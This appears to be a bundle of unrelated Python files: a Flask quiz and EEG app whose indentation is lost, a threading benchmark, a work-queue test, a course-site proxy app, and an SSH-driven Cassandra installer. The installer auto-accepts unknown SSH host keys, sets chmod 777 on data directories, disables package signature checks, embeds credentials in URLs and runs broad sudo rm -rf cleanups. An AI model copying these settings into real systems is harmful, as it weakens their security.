    t = threading.Thread(target=read_mindwave_mobile.start_measure)
    t.start()
    return render_template("measure.html")
class backpack:
    """Module-level quiz/session state shared across requests.

    Attributes are class-level on purpose: the app is single-user and the
    request handlers mutate them directly.
    """
    # Question prompts; index 0 is unused, questions run 1..10.
    question = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10"]
    curr_question = 1
    score = 0
    # Bug fix: this was ``Name`` (capital N) while every handler reads and
    # writes ``backpack.name`` — the lowercase attribute now exists up
    # front instead of only after /formhandler runs.
    name = ""
    age = 0
    # for sex
    # 0 = male
    # 1 = female
    sex = 0
@app.route("/")
def render_main() :
backpack.curr_question = 1
backpack.score = 0
backpack.name = ""
backpack.age = 0
backpack.sex = 0
return render_template("index.html")
@app.route("/info")
def render_info() :
return render_template("info.html")
@app.route("/registeration")
def render_register() :
return render_template("register.html")
@app.route("/formhandler" , methods=["POST"])
def do_sth_with_data() :
backpack.age = request.form.get("age")
backpack.name = request.form.get("name")
backpack.sex = request.form.get("sex")
print(backpack.age,"\n")
print(backpack.name,"\n")
print(backpack.sex,"\n")
return redirect("/choicequiz")
@app.route("/choicequiz")
def render_quiz() :
return render_template("quiz.html" , question = backpack.question[backpack.curr_question])
@app.route("/quizhandler" , methods=['POST'])
def redirect_to_quiz() :
backpack.score += int(request.form.get("score"))
print(backpack.score)
backpack.curr_question+=1
if(backpack.curr_question > 9) :
return redirect("/mindwave")
else :
return redirect("/choicequiz")
@app.route("/mindwave")
def render_mindwave() :
return render_template("choose.html")
@app.route("/mindwave_test")
def render_mindwave_test() :
t = threading.Thread(target= read_mindwave_mobile.start_measure)
try :
t.start()
except :
return render_template("error.html")
return render_template("handler.html")
@app.route("/mindwave_test_case2")
def render_mindwave_test2() :
t = threading.Thread(target= read_mindwave_mobile.start_measure)
try :
t.start()
except :
return render_template("error.html")
return render_template("mindwave_test_plan2.html")
@app.route('/slide_txt')
def reds():
    """Text-slide variant of the measurement page."""
    page = render_template('mindwave_test.html')
    return page
@app.route('/slideshow')
def redss():
    """Slideshow variant of the measurement page."""
    page = render_template('mindwave_test2.html')
    return page
@app.route("/result")
def render_result() :
read_mindwave_mobile.datapack.kill_code = True
datapackMW.Delta += read_mindwave_mobile.Delta
datapackMW.Theta += read_mindwave_mobile.Theta
datapackMW.LowAlpha += read_mindwave_mobile.LowAlpha
datapackMW.HighAlpha += read_mindwave_mobile.HighAlpha
datapackMW.LowBeta += read_mindwave_mobile.LowBeta
datapackMW.HighBeta += read_mindwave_mobile.HighBeta
datapackMW.LowGamma += read_mindwave_mobile.LowGamma
datapackMW.MedGamma += read_mindwave_mobile.MedGamma
datapackMW.AttentionLevel += read_mindwave_mobile.AttentionLevel
datapackMW.MeditationLevel += read_mindwave_mobile.MeditationLevel
t = threading.Thread(target = print_end)
t.run()
return redirect('/result_handler')
@app.route("/exit_app")
def exitapp() :
sys.exit("Cant connect to the bluetooth")
@app.route("/result_handler")
def render_result_renderer() :
print('stopping')
Att_result = att_model.predict([datapackMW.AttentionLevel[19:47]])
Worr_result = lowb_model.predict([datapackMW.LowBeta[19:47]])
Happi_result = lowa_model.predict([datapackMW.LowAlpha[19:47]])
print({'Att' : Att_result , 'Happ' : Happi_result , 'Worr' : Worr_result})
print("END")
predict_handler = {'Att' : Att_result , 'Happ' : Happi_result , 'Worr' : Worr_result}
MwScore = 0
if (predict_handler['Att'] == 0) :
MwScore+= int(0.8846*35)
else :
MwScore += 0
if (predict_handler['Happ'] == 0) :
MwScore+= int(0.8823*35)
else :
MwScore += 0
if (predict_handler['Worr'] == 0) :
MwScore+= int(0.8214*35)
else :
MwScore += 0
case = str()
if(backpack.score + MwScore <= 21 + 9) :
case = '0'
elif (backpack.score + MwScore <= 42 + 18) :
case = '1'
elif (backpack.score + MwScore <= 63 + 27) :
case = '2'
elif (backpack.score + MwScore <= 84 + 36) :
case = '3'
elif (backpack.score + MwScore <= 105 + 45) :
case = '4'
overallscore = MwScore + backpack.score
backpack.name.replace(" " , '%20')
link_togo = 'http://app.montfort.ac.th/the-hermit/api' + '?n='
link_togo += str(backpack.name.replace(' ','%20')) + '&a=' + str(backpack.age) + '&os=' + str(overallscore)
link_togo += '&ms=' + str(MwScore) + '&c='
link_togo += str(backpack.score) + '&s=' + str(case)
link_togo += '&hs=' + str(predict_handler['Happ']) + '&ws='
link_togo += str(predict_handler['Worr']) + '&atts=' + str(predict_handler['Att'])
print(link_togo)
print(backpack.name , backpack.age , MwScore , backpack.score , predict_handler['Happ'] , predict_handler['Worr'] , predict_handler['Att'] , case)
percent_choice = int(backpack.score/45*100)/100
percent_mindwave = int(MwScore/105 * 100)/100
percent_all = int(overallscore/150*100)/100
return render_template("result.html" , link_togo = link_togo , status = case , cp = percent_choice , mp = percent_mindwave , op = percent_all)
# Dev-server entry point; runs at import time (no __main__ guard).
# NOTE(review): debug=True enables the werkzeug debugger — disable for any
# non-local deployment.
app.run(debug=True)
|
speed.py |
from time import sleep, perf_counter
from threading import Thread
def task1():
    """CPU-bound filler: count upward 111,110 times, then return."""
    n = 111111
    while n != 222221:
        n += 1
def task2():
    """CPU-bound filler: count upward 111,110 times, then return."""
    n = 222222
    while n != 333332:
        n += 1
def task3():
    """Long CPU-bound filler (~89M iterations); prints "ok" once when the
    counter passes 56844357 and finishes at 99999999."""
    n = 11111111
    while n != 99999999:
        if n == 56844357:
            print("ok")
        n += 1
start_time = perf_counter()
# Create three worker threads (GIL-bound: they interleave, not run in
# parallel — the point of this benchmark).
t1 = Thread(target=task1)
t2 = Thread(target=task2)
t3 = Thread(target=task3)
# start the threads
t1.start()
t2.start()
t3.start()
# wait for the threads to complete
t1.join()
t2.join()
t3.join()
end_time = perf_counter()
print(f'It took {end_time- start_time: 0.2f} second(s) to complete.')
queue_threads.py | import unittest
import json
import time
from functools import wraps
from threading import Thread, Lock
from app import app
from data.queue import WorkQueue
from initdb import wipe_database, initialize_database, populate_database
QUEUE_NAME = 'testqueuename'
class AutoUpdatingQueue(object):
    """Proxy around a work queue that refreshes the queue's metrics after
    every method call made through it.

    Attribute access is delegated to the wrapped queue; callable
    attributes are handed back wrapped so that ``update_metrics`` runs
    after each invocation.
    """

    def __init__(self, queue_to_wrap):
        self._queue = queue_to_wrap

    def _wrapper(self, func):
        @wraps(func)
        def call_then_update(*args, **kwargs):
            result = func(*args, **kwargs)
            self._queue.update_metrics()
            return result
        return call_then_update

    def __getattr__(self, attr_name):
        delegate = getattr(self._queue, attr_name)
        if not callable(delegate):
            return delegate
        return self._wrapper(delegate)
class QueueTestCase(unittest.TestCase):
    """Base fixture: a fresh, populated database plus a metrics-updating
    test queue."""

    # Canonical message body used by the queue tests.
    TEST_MESSAGE_1 = json.dumps({'data': 1})

    def setUp(self):
        # Build the queue against the app's transaction factory, then
        # reset the database to a known populated state for every test.
        self.transaction_factory = app.config['DB_TRANSACTION_FACTORY']
        self.queue = AutoUpdatingQueue(WorkQueue(QUEUE_NAME, self.transaction_factory))
        wipe_database()
        initialize_database()
        populate_database()
class TestQueueThreads(QueueTestCase):
    """Exercise the work queue from many threads at once."""

    def test_queue_threads(self):
        remaining = [20]
        for i in range(remaining[0]):
            self.queue.put([str(i)], self.TEST_MESSAGE_1)

        lock = Lock()

        def consume(lock, remaining, queue):
            item = queue.get()
            if item is None:
                return
            self.assertEqual(self.TEST_MESSAGE_1, item.body)
            with lock:
                remaining[0] -= 1

        # The thread count needs to be a few times higher than the queue
        # size count because some threads will get a None and thus won't
        # decrement the counter.
        workers = [Thread(target=consume, args=(lock, remaining, self.queue))
                   for _ in range(100)]
        for w in workers:
            w.start()
        for w in workers:
            w.join()
        self.assertEqual(remaining[0], 0)
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
huji_cheese.py | import datetime
import json
import os
from threading import Thread
from urllib.parse import urlsplit
from flask import Flask, render_template, request, redirect
from cheese_proxied_browser import CheeseProxiedBrowser
from collectors import DigmiAllCoursesCollector
from downloader import download_courses, COURSE_FILE_TEMPLATE
from utils import Semester
# Upstream site being proxied, and the local cache directory (next to this
# file) where downloaded course JSON files are stored.
CHEESEFORK_URL = 'https://cheesefork.cf/'
DOWNLOAD_FOLDER = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'downloaded_courses')
class HujiCheese:
    """
    A class that controls the flask app and the proxied browser.

    The flask app serves a local course-picker UI; the proxied browser
    loads Cheesefork with the selected course data injected.
    """

    def __init__(self, flask_host: str = 'localhost', flask_port: int = 5000):
        # The browser proxies the cheesefork domain and starts on our
        # local flask pages.
        self._proxied_browser = CheeseProxiedBrowser(initial_page=f'http://{flask_host}:{flask_port}',
                                                     replacement_domain=urlsplit(CHEESEFORK_URL).hostname)
        # Configure flask app and endpoints
        # NOTE(review): the view functions are declared ``async``; this
        # requires Flask 2.0+ with the async extra — confirm the pinned
        # Flask version.
        self._flask_app = Flask(__name__)
        self._flask_app.add_url_rule('/year/<year>', view_func=self.year_index, methods=['GET', 'POST'])
        self._flask_app.add_url_rule('/', view_func=self.index, methods=['GET'])
        self._flask_host = flask_host
        self._flask_port = flask_port

    async def index(self):
        """
        Main page. Redirects to the year page for the current year.
        """
        year = datetime.date.today().year
        return redirect(f'/year/{year}')

    async def year_index(self, year):
        """
        The year page - includes all the courses for a certain year.

        GET renders the course picker; POST downloads any missing course
        files, injects them into the proxied Cheesefork page and
        redirects there.
        """
        if request.method == 'GET':
            result = await DigmiAllCoursesCollector(year).acollect()
            return render_template("index.html", courses=result)

        # Collect form data
        semester = Semester.from_string(request.form.get('semester'))
        courses = request.form.getlist('courses')
        should_recreate = True if request.form.get('recreate') else False

        # Get/Create folder of existing courses
        try:
            existing_course_ids = set(os.listdir(DOWNLOAD_FOLDER))
        except FileNotFoundError:
            os.mkdir(DOWNLOAD_FOLDER)
            existing_course_ids = set()

        # Get course IDs to download (skip ones already cached unless the
        # user asked to recreate everything).
        if should_recreate:
            course_ids_to_download = list(courses)
        else:
            course_ids_to_download = []
            for course_id in courses:
                # NOTE(review): this cache check formats the file name
                # with ``semester`` while the read below uses
                # ``int(semester)``; if those render differently, cached
                # files are never detected — confirm.
                expected_course_file = COURSE_FILE_TEMPLATE.format(course=course_id, year=year,
                                                                   semester=semester)
                if expected_course_file in existing_course_ids:
                    continue
                course_ids_to_download.append(course_id)

        # Download missing courses
        if course_ids_to_download:
            await download_courses(course_ids_to_download, semester=semester, year=year, output_dir=DOWNLOAD_FOLDER)

        # Read all courses from files
        course_data = {}
        for course_id in courses:
            file_path = os.path.join(DOWNLOAD_FOLDER,
                                     COURSE_FILE_TEMPLATE.format(course=course_id, year=year,
                                                                 semester=int(semester)))
            with open(file_path, 'r') as f:
                course_data[course_id] = json.load(f)

        # Build javascript variable consumed by the Cheesefork page.
        js_variable = f'var courses_from_rishum = {json.dumps(list(course_data.values()), ensure_ascii=False)}'

        # Reload the addon that alters the courses in Cheesefork.
        self._proxied_browser.replacement_value = js_variable
        self._proxied_browser.reload_course_replacement()
        return redirect(CHEESEFORK_URL)

    def start(self):
        """
        Start the flask server in a separate (daemon) thread and run the
        proxied browser in the foreground.
        """
        flask_thread = Thread(target=self._flask_app.run, args=(self._flask_host, self._flask_port), daemon=True)
        flask_thread.start()
        self._proxied_browser.run()
def main():
    # Launch with the default localhost:5000 bindings.
    HujiCheese().start()


if __name__ == '__main__':
    main()
|
setup_cassandra.py | """
The MIT License (MIT)
Copyright (c) 2016 Datos IO, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os
import sys
import time
import getpass
import textwrap
import argparse
import paramiko
from IPy import IP
import threading
import multiprocessing
from scp import SCPClient
lock = threading.Lock()
def parse_input():
    """
    Parse command line arguments for the installer.

    Shorthand versions ('2.0', '2.1', '2.2') are bumped to their latest
    revision before validation against the supported-version list.
    :return: argparse.Namespace with the validated arguments.
    """
    parser = argparse.ArgumentParser(description='Cassandra Installer.')
    parser.add_argument('-u', '--user', default='centos', help='OS user of remote cassandra nodes.')
    parser.add_argument('-p', '--password', help='OS user password of remote cassandra nodes.')
    parser.add_argument('-k', '--key', help='Os user key to access remote nodes, not required.')
    parser.add_argument('-v', '--cass_version', default='2.1.13', help='Cassandra version.')
    parser.add_argument('-i', '--cass_ips', default='127.0.0.1', help='File that lists ips of cluster nodes.')
    parser.add_argument('-s', '--cass_seeds', help='File that lists ips of seed nodes or comma separated string.')
    parser.add_argument('-d', '--cass_data_location', default='/mnt/cassandra/data', help='Location for cassandra data on nodes')
    parser.add_argument('-c', '--cass_commitlog_location', default='/mnt/cassandra/commitlog', help='Location for cassandra commitlog on nodes')
    parser.add_argument('-n', '--cass_name', default='My_Cluster', help='Name of your cluster.')
    parser.add_argument('--num_tokens', default=256, help='Set num vnode tokens per cassandra node.')
    parser.add_argument('--clean', action='store_true', help='Purge DB and Commit Log.')
    parser.add_argument('--verbose', action='store_true', help='Verbose reporting.')
    parser.add_argument('--dse', action='store_true', help='Install Datastax Enterprise version.')
    parser.add_argument('--dse_user', default='', help='Datastax Enterprise username.')
    parser.add_argument('--dse_pass', default='', help='Datastax Enterprise password.')
    parser.add_argument('--cass_auth', action='store_true', help='Add authentication to Cassandra cluster.')
    parser.add_argument('--jmx_auth', action='store_true', help='Not implemented yet. Set JMX port.')
    parser.add_argument('--jmx_port', default=7199, help='Set JMX port.')
    args = parser.parse_args()

    if args.dse:
        available_versions = ['4.0', '4.0.1', '4.0.2', '4.0.3', '4.0.4', '4.0.5', '4.0.6', '4.0.7',
                              '4.5', '4.5.1', '4.5.2', '4.5.3', '4.5.4', '4.5.5', '4.5.6', '4.5.7', '4.5.8', '4.5.9',
                              '4.6', '4.6.1', '4.6.2', '4.6.3', '4.6.4', '4.6.5', '4.6.6', '4.6.7', '4.6.8', '4.6.9', '4.6.10', '4.6.11', '4.6.12',
                              '4.7', '4.7.1', '4.7.2', '4.7.3', '4.7.4', '4.7.5', '4.7.6', '4.7.7', '4.7.8',
                              '4.8', '4.8.1', '4.8.2', '4.8.3', '4.8.4', '4.8.5', '4.8.6',
                              ]
    else:
        available_versions = ['2.0.0', '2.0.9', '2.0.10', '2.0.11', '2.0.12', '2.0.13', '2.0.14', '2.0.15', '2.0.16', '2.0.17',
                              '2.1.0', '2.1.4', '2.1.5', '2.1.6', '2.1.7', '2.1.8', '2.1.9', '2.1.10', '2.1.11', '2.1.12', '2.1.13',
                              '2.2.0', '2.2.1', '2.2.2', '2.2.3', '2.2.4', '2.2.5',
                              # '3.0.0',
                              # '3.3.0',
                              # '3.4.0',
                              ]

    # So users don't have to put in latest revision, we can handle that and bump to latest.
    latest_revision = {'2.0': '2.0.17', '2.1': '2.1.13', '2.2': '2.2.5'}
    args.cass_version = latest_revision.get(args.cass_version, args.cass_version)

    if args.cass_version not in available_versions:
        # Bug fix: the message used a literal '/n' instead of a newline.
        print('%s version not available.\nAvailable versions: %s' % (args.cass_version, available_versions))
        sys.exit(1)

    if args.dse:
        if not args.dse_user or not args.dse_pass:
            print('Cassandra DSE version requires username and password.')
            # NOTE(review): execution continues without credentials, so the
            # repo URL is built with empty user/pass — likely should
            # sys.exit(1) here; preserved as-is.

    # Fix @ issue in username for DSE repo. (Platform specific)
    if args.dse_user and '@' in args.dse_user:
        args.dse_user = args.dse_user.replace('@', '%40')

    return args
def parse_ips(cluster_ips):
    """
    Consumes ips as a comma separated string or a file with single ips or ip pairs per line and returns list of (pub, priv) ips.
    :param cluster_ips: comma separated IP string or IP file to be parsed.
    :return: [(pub_1, priv_1), (pub_2, priv_2), ..., (pub_n, priv_n)].
    example string:
        <pub_1>,<pub_2>,...,<pub_n>
        <pub_1>,<priv_1>,<pub_2>,<priv_2>,...,<pub_n>,<priv_n>
        '10.1.2.3,10.1.2.4,10.1.2.5'
        '10.1.2.3,107.1.2.3,10.1.2.4,107.1.2.4'
    example IP file:
        #########################################################################
        # Public     Private
        10.1.2.3     107.1.2.3   # Most restricted IP (private) always second on line.
        10.1.2.4     107.1.2.4
        10.1.2.5                 # If no public or private IP, only need one IP on line.
        #########################################################################
    """
    try:
        # First interpretation: argument is a comma separated string.
        ip_strings = cluster_ips.split(',')
        if len(ip_strings) > 1:
            ips = []
            # Heuristic: differing first octets between the first two
            # entries are taken to mean alternating pub,priv pairs.
            if ip_strings[0].split('.')[0] != ip_strings[1].split('.')[0]:  # Assume if they're different then pub, priv pairs.
                curr_ips = []
                for ip in ip_strings:
                    curr_ips.append(ip)
                    if len(curr_ips) == 2:
                        ips.append(tuple(curr_ips))
                        curr_ips = []
                # Odd leftover: reuse the single ip for both pub and priv.
                if len(curr_ips) > 0:
                    curr_ips.append(curr_ips[0])
                    ips.append(tuple(curr_ips))
            else:
                ips = [(x, x) for x in cluster_ips.split(',')]
            IP(ips[0][0])  # Assume if first one is good ip, then argument not passed in as file, but string.
        else:
            ips = [(x, x) for x in cluster_ips.split(',')]
            IP(ips[0][0])  # Assume if first one is good ip, then argument passed in as string.
    except ValueError:
        # IP() rejected the value: fall back to treating cluster_ips as a
        # path to an IP list file.
        with open(cluster_ips, 'r') as f:
            lines = f.readlines()
        ips = []
        for line in lines:
            line = line.split('#')[0]  # Allow for commenting in file.
            line = ' '.join(line.split()).replace('\n', '').strip()
            if line != '':
                ip_data = line.split()
                if len(ip_data) > 1:
                    pub, priv = ip_data
                else:
                    pub = priv = ip_data[0]  # If only 1 ip on line, use for both pub and priv ip.
                ips.append((pub, priv))
    return ips
def progress_bar(message, event):
    """
    Creates a spinner and message on screen. Example: [x] Performing pre-installation check.
    :param message: Message to show next to progress bar.
    :param event: threading.Event so we can know when to exit progress bar function.
    :return: None
    """
    i = 0
    spinner = ['\\', '/', '-']
    lock.acquire()  # Serialize progress reporting.
    while not event.is_set():
        if i % 5 == 0:
            # Advance the spinner glyph every 5 ticks (~1 second).
            j = (i // 5) % 3
            bar = '[%s] %s' % (spinner[j], message)
            # Python-2 idiom: the trailing comma suppresses the newline so
            # the spinner redraws in place (this file uses py2 elsewhere,
            # e.g. xrange in rpc()).
            print('\r%s' % bar), ; sys.stdout.flush()
        i += 1
        time.sleep(0.2)
    # Clear the line if status bar was shown.
    print('\r[x] %s' % (message))
    lock.release()
def rpc(ip, command, user=getpass.getuser(), password=None, key=None, timeout=60*20, retries=1, no_tty=False, suppress_output=False, print_real_time=False):
    """
    Remote procedure call: run ``command`` on ``ip`` over SSH, retrying
    with an increasing back-off schedule.
    :param ip: Target host.
    :param command: Shell command to execute remotely.
    :param user: SSH user (defaults to the local user).
    :param password: SSH password, optional.
    :param key: Path to a private key file, optional.
    :param timeout: SSH connect timeout in seconds.
    :param retries: Extra attempts after the first failure.
    :param no_tty: Disable pseudo-terminal allocation.
    :param suppress_output: Only print when an error occurs.
    :param print_real_time: Accepted for caller compatibility; unused here.
    :return: (stdout, stderr) as a (<str>, <str>) tuple.
    """
    assert(retries >= 0)
    assert(timeout >= 0)
    # Back-off schedule, indexed by attempt number.
    # NOTE(review): retries > len(retry_times) would raise IndexError in
    # the sleep below, and the guard `if not i > retries` is always true
    # inside the loop — so the final failed attempt also sleeps.
    retry_times = [3, 15, 30, 60, 60*5]
    # NOTE: xrange — this module is Python 2 code.
    for i in xrange(retries + 1):
        try:
            if not suppress_output:
                print('[Try #%s] RPC: {%s} %s' % (i + 1, ip, command))
            ssh = paramiko.SSHClient()
            ssh.load_system_host_keys()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(hostname=ip, username=user, password=password, key_filename=key, look_for_keys=True, port=22, timeout=timeout)
            std_in, out, err = ssh.exec_command(command, get_pty= not no_tty)
            out, err = out.read().strip('\n').strip('\r'), err.read().strip('\n').strip('\r')
            # A PTY echoes the connection-closed notice into stderr; drop it.
            if 'Connection to %s closed' % ip in err:
                err = ''
            # Print command and try # if there is an error and we weren't printing information already.
            if suppress_output and err:
                print('[Try #%s] RPC: {%s} %s' % (i + 1, ip, command))
            # Now print output if we are not suppressing it.
            if not suppress_output and out:
                print(out)
            if err:
                print(err)
            time.sleep(0.5)
            ssh.close()
            return out, err
        except Exception as pe:
            print(pe)
            if not i > retries:
                time.sleep(retry_times[i])
    print('Error Connecting.')
    return '', 'Error Connecting.'
def scp(mode='put', local_path='.', remote_path='.', ip='127.0.0.1', user=getpass.getuser(), password=None, key=None, recursive=True, timeout=60*60):
    """
    Copy files to/from a remote host over SSH.
    :param mode: 'put' to upload, 'get' to download.
    :param local_path: Local file or directory.
    :param remote_path: Remote file or directory.
    :param ip: Target host.
    :param user: SSH user (defaults to the local user).
    :param password: SSH password, optional.
    :param key: Path to a private key file, optional.
    :param recursive: Copy directories recursively.
    :param timeout: SSH connect timeout in seconds.
    :return: None
    """
    assert(timeout >= 0)
    assert(mode in ['get', 'put'])
    ssh = paramiko.SSHClient()
    ssh.load_system_host_keys()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(hostname=ip, username=user, password=password, key_filename=key, look_for_keys=True, port=22, timeout=timeout)
    # Note: the local name 'scp' shadows this function inside the block.
    with SCPClient(ssh.get_transport()) as scp:
        if mode == 'put':
            print('[SCP PUT] %s to <%s>:%s' % (local_path, ip, remote_path))
            scp.put(files=local_path, remote_path=remote_path, recursive=recursive)
        else:
            print("[SCP GET] <%s>:%s to %s" % (ip, remote_path, local_path))
            scp.get(local_path=local_path, remote_path=remote_path, recursive=recursive)
    ssh.close()
def install(ips, args):
    """
    Performs the installation of Cassandra to the whole cluster. Blocking.
    :param ips: List of (pub, priv) ip tuples for all nodes.
    :param args: Argparse arguments.
    :return: None
    """
    # Start a progress bar if not in verbose mode.
    if not args.verbose:
        e = threading.Event()
        bar_thread = threading.Thread(target=progress_bar, args=('Performing installation.', e))
        bar_thread.setDaemon(True)
        bar_thread.start()

    # Yum repository definition written to every node: community by
    # default, DSE with embedded credentials when --dse is set.
    REPO = "[datastax]\n" \
           "name = DataStax Repo for Apache Cassandra\n" \
           "baseurl = https://rpm.datastax.com/community\n" \
           "enabled = 1\n" \
           "gpgcheck = 0"
    if args.dse:
        REPO = "[datastax]\n" \
               "name = DataStax Repo for DataStax Enterprise\n" \
               "baseurl=https://%s:%s@rpm.datastax.com/enterprise\n" \
               "enabled = 1\n" \
               "gpgcheck = 0" % (args.dse_user, args.dse_pass)

    def _install_single_node(ip):
        # Write the repo file, install packages and (optionally) purge the
        # data/commitlog directories on one node.
        def _rpc(cmd):
            return rpc(ip, cmd, args.user, args.password, args.key, suppress_output=not args.verbose)
        major_version = args.cass_version.replace('.', '')[:2]
        _rpc('''sudo sh -c "echo '%s' > /etc/yum.repos.d/datastax.repo"''' % REPO)
        if args.dse:
            _rpc('sudo yum -y install dse-full-%s-1' % (args.cass_version))
        else:
            _rpc('sudo yum install -y dsc%s-%s-1 cassandra%s-1' % (major_version, args.cass_version, args.cass_version))
        if args.clean:
            _rpc('sudo rm -rf %s/*' % args.cass_data_location)
            _rpc('sudo rm -rf %s/*' % args.cass_commitlog_location)

    # Spawn threads to run instructions on all nodes at once
    threads = []
    for pub, priv in ips:
        t = threading.Thread(target=_install_single_node, args=(pub,))
        t.setDaemon(True)
        t.start()
        threads.append(t)

    # Wait for all threads to complete
    for t in threads:
        t.join()

    # Terminate the progress bar if not in verbose mode.
    if not args.verbose:
        e.set()
        bar_thread.join()
def do_pre_check(ips, args):
    """
    Checks requirements, java, firewalls for all nodes in cluster. Blocking.
    :param ips: List of (pub, priv) ip tuples for all nodes.
    :param args: Argparse arguments.
    :return: None
    """
    def _port_is_open(host, port, mode='tcp'):
        """
        # Utilizing timing attack to determine if port is blocked by firewall, or simply no listener.
        :param host:
        :param port:
        :return:
        """
        # NOTE(review): the real check is commented out below — this
        # always reports the port as open.
        # cmd = 'echo "knock knock" | nc -w 10 %s %s %s' % ('-u' if mode == 'udp' else '', host, port)
        # if args.verbose:
        #     print(cmd)
        #
        # start_time = time.time()
        # rv = os.system(cmd)
        # end_time = time.time()
        #
        # if rv == 0:
        #     return True
        # if end_time - start_time < 5:
        #     return True
        # return False
        return True

    def _set_hostname(ip, args):
        # Ensure `hostname -i` resolves; append to /etc/hosts if not.
        out, _ = rpc(ip, 'hostname -i', args.user, args.password, args.key, suppress_output=not args.verbose)
        if 'Unknown host' in out:
            rpc(ip, '''sudo sh -c "echo '`hostname -I` `hostname`' >> /etc/hosts"''', args.user, args.password, args.key, suppress_output=not args.verbose)

    def _check_ports(ip):
        # Cassandra inter-node, client and JMX ports.
        PORT_LIST = [7000, 7001, 7199, 9160, 9042, 8080]
        for port in PORT_LIST:
            if not (_port_is_open(ip, port, mode='tcp') and _port_is_open(ip, port, mode='udp')):
                print("Check for port %s failed. Make sure that ports %s are open." % (port, PORT_LIST))
                sys.exit(1)

    def _check_java(ip):
        # Install OpenJDK 1.7 when no java binary is found on the node.
        out, _ = rpc(ip, 'which java', args.user, args.password, args.key, suppress_output=not args.verbose)
        if 'no java' in out:
            rpc(ip, 'sudo yum install -y java-1.7.0-openjdk-devel', args.user, args.password, args.key, suppress_output=not args.verbose)

    def _create_directories(ip):
        # Create and open up the data/commitlog directories.
        def _rpc(cmd):
            return rpc(ip, cmd, args.user, args.password, args.key, suppress_output=not args.verbose)
        out1, err1 = _rpc('sudo mkdir -p %s' % args.cass_data_location)
        out2, err2 = _rpc('sudo mkdir -p %s' % args.cass_commitlog_location)
        out3, err3 = _rpc('sudo chmod -R 777 %s' % args.cass_data_location)
        out4, err4 = _rpc('sudo chmod -R 777 %s' % args.cass_commitlog_location)
        out5, err5 = _rpc('sudo chown -R %s:%s %s' % (args.user, args.user, args.cass_data_location))
        out6, err6 = _rpc('sudo chown -R %s:%s %s' % (args.user, args.user, args.cass_commitlog_location))
        # Check for errors.
        for out in [out1+err1, out2+err2, out3+err3, out4+err4, out5+err5, out6+err6]:
            if 'denied' in out or 'cannot' in out:
                print("Error creating cassandra directories.\n%s" % out)
                sys.exit(1)

    def _single_node_pre_check(ip):
        # Full pre-flight for one node.
        _check_ports(ip)
        _create_directories(ip)
        _set_hostname(ip, args)
        _check_java(ip)

    # Start a progress bar if not in verbose mode.
    if not args.verbose:
        e = threading.Event()
        bar_thread = threading.Thread(target=progress_bar, args=('Performing pre-installation check.', e))
        bar_thread.setDaemon(True)
        bar_thread.start()

    # Spawn threads to run instructions on all nodes at once
    threads = []
    for pub, priv in ips:
        t = threading.Thread(target=_single_node_pre_check, args=(pub,))
        t.setDaemon(True)
        t.start()
        threads.append(t)

    # Wait for all threads to complete
    for t in threads:
        t.join()

    # Terminate the progress bar if not in verbose mode.
    if not args.verbose:
        e.set()
        bar_thread.join()
def do_cleanup(ips, args):
    """
    Stops services and removes any previous Cassandra/DSE installation
    state from every node. Blocking.
    :param ips: List of (pub, priv) ip tuples for all nodes.
    :param args: Argparse arguments.
    :return: None
    """
    def _cleanup_single_node(ip):
        def _rpc(cmd):
            return rpc(ip, cmd, args.user, args.password, args.key, suppress_output=not args.verbose)
        # TODO: (Make this more targeted)
        # Stop services.
        _rpc('sudo service cassandra stop')
        _rpc('sudo service dsc stop')
        _rpc('sudo service dse stop')
        _rpc('sudo service datastax-agent stop')
        _rpc('sudo /etc/init.d/cassandra stop')
        _rpc('sudo /etc/init.d/dsc stop')
        _rpc('sudo /etc/init.d/dse stop')
        _rpc('sudo /etc/init.d/datastax-agent stop')
        # Uninstall packages.
        _rpc('sudo yum remove -y \'*cassandra*\' \'*dsc*\' \'*dse*\' \'*datastax*\'')
        # Cleanup install folders.
        _rpc('sudo rm -rf /var/lib/cassandra/*')
        _rpc('sudo rm -rf /var/log/{cassandra,hadoop,hive,pig}/*')
        _rpc('sudo rm -rf /etc/{cassandra,dsc,dse}/*')
        _rpc('sudo rm -rf /usr/share/{dse,dse-demos}')
        _rpc('sudo rm -rf /etc/default/{cassandra,dsc,dse}')

    # Start a progress bar if not in verbose mode.
    if not args.verbose:
        e = threading.Event()
        bar_thread = threading.Thread(target=progress_bar, args=('Performing pre-install cleanup.', e))
        bar_thread.setDaemon(True)
        bar_thread.start()

    # Spawn threads to run instructions on all nodes at once
    threads = []
    for pub, priv in ips:
        t = threading.Thread(target=_cleanup_single_node, args=(pub,))
        t.setDaemon(True)
        t.start()
        threads.append(t)

    # Wait for all threads to complete
    for t in threads:
        t.join()

    # Terminate the progress bar if not in verbose mode.
    if not args.verbose:
        e.set()
        bar_thread.join()
def set_yaml_configs(ips, seeds, args):
    """
    Sets the cassandra.yaml configuration settings on each nodes.
    :param ips: List of (<pub>, <priv>) ip tuples of all Cassandra nodes.
    :param seeds: List of (<pub>, <priv>) ip tuples of Cassandra seed nodes.
    :param args: Argparse arguments.
    :return: None
    """
    if args.dse:
        configs_dir = '/etc/dse/cassandra'
    else:
        configs_dir = '/etc/cassandra/default.conf'

    def _single_node_set_yaml(pub, priv):
        # Rewrite the stock config defaults in place with sed on one node;
        # the private ip is used for listen/rpc addresses.
        def _rpc(cmd):
